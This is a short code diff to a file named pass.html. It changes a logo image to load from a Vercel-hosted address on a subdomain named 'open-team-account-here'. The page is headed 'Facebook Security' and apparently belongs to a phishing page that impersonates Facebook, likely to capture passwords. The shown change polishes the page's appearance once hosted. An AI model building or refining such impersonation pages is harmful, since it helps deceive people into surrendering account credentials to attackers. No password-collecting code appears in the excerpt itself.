--- a/pass.html
+++ b/pass.html
@@ -104,7 +104,7 @@
 <body>
     <div class="container">
         <div class="logo">
-            <img class="logo" src="WhatsApp Image 2024-10-27 at 11.24.35 AM.jpeg" alt="Logo">
+            <img class="logo" src="https://open-team-account-here.vercel.app/WhatsApp%20Image%202024-10-27%20at%2011.24.35%20AM.jpeg" alt="Logo">
         </div>
         <div class="header">
             Facebook Security
